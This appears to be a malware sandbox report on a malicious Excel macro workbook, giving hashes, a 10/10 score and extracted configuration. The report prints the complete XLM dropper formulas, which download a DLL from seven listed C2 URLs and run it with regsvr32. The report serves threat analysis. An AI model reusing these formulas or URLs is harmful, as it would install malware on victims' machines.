Overview

overview

10

Static

static

10

90d32879c3...6.xlsm

windows7-x64

10

90d32879c3...6.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    90d32879c3c320b5f1ec2501c2499cdfd194ae2cf8a829054bcdc0e93df8aec6

  • Size

    29KB

  • Sample

    241120-pdcxxaxbpn

  • MD5

    a34b8e3d1e1d1b39594ff862b756a56a

  • SHA1

    2ef39e2fe5e5f60fdb723c4521aaa193a626ef84

  • SHA256

    90d32879c3c320b5f1ec2501c2499cdfd194ae2cf8a829054bcdc0e93df8aec6

  • SHA512

    e342dad34e738e54ba5510d059f597cae2953ee586c2a101564de708095b3fdf39a43dfe480a6a42dc2d0242cc55c596547fb17ef6911676deb242a845517cf7

  • SSDEEP

    384:NvANFOv+7UaivQ2BNZJibbwBUA6+h4wyqJeAqcctU1jrYsu8HP7jFFtCvI:VqUtVNZAXby9y+cccS1AsuIjxl

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://iqraacfindia.org/wp-admin/dG/

https://he.adar-and-ido.com/wp-admin/xk7D/

https://www.digigoal.fr/wp-admin/VfU0aIj/

https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/

https://al-brik.com/vb/mMQlbHPCX/

https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/

https://biantarajaya.com/awstats-icon/VR5wDEvBj/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://iqraacfindia.org/wp-admin/dG/","..\whxc.dll",0,0) =IF('IJEGVS'!H16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://he.adar-and-ido.com/wp-admin/xk7D/","..\whxc.dll",0,0)) =IF('IJEGVS'!H18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.digigoal.fr/wp-admin/VfU0aIj/","..\whxc.dll",0,0)) =IF('IJEGVS'!H20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/","..\whxc.dll",0,0)) =IF('IJEGVS'!H22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://al-brik.com/vb/mMQlbHPCX/","..\whxc.dll",0,0)) =IF('IJEGVS'!H24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/","..\whxc.dll",0,0)) =IF('IJEGVS'!H26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://biantarajaya.com/awstats-icon/VR5wDEvBj/","..\whxc.dll",0,0)) =IF('IJEGVS'!H28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\whxc.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://iqraacfindia.org/wp-admin/dG/
xlm40.dropper

https://he.adar-and-ido.com/wp-admin/xk7D/
xlm40.dropper

https://www.digigoal.fr/wp-admin/VfU0aIj/
xlm40.dropper

https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/
xlm40.dropper

https://al-brik.com/vb/mMQlbHPCX/
xlm40.dropper

https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/
xlm40.dropper

https://biantarajaya.com/awstats-icon/VR5wDEvBj/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://iqraacfindia.org/wp-admin/dG/
xlm40.dropper

https://he.adar-and-ido.com/wp-admin/xk7D/
xlm40.dropper

https://www.digigoal.fr/wp-admin/VfU0aIj/

Targets

    • Target

      90d32879c3c320b5f1ec2501c2499cdfd194ae2cf8a829054bcdc0e93df8aec6

    • Size

      29KB

    • MD5

      a34b8e3d1e1d1b39594ff862b756a56a

    • SHA1

      2ef39e2fe5e5f60fdb723c4521aaa193a626ef84

    • SHA256

      90d32879c3c320b5f1ec2501c2499cdfd194ae2cf8a829054bcdc0e93df8aec6

    • SHA512

      e342dad34e738e54ba5510d059f597cae2953ee586c2a101564de708095b3fdf39a43dfe480a6a42dc2d0242cc55c596547fb17ef6911676deb242a845517cf7

    • SSDEEP

      384:NvANFOv+7UaivQ2BNZJibbwBUA6+h4wyqJeAqcctU1jrYsu8HP7jFFtCvI:VqUtVNZAXby9y+cccS1AsuIjxl

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks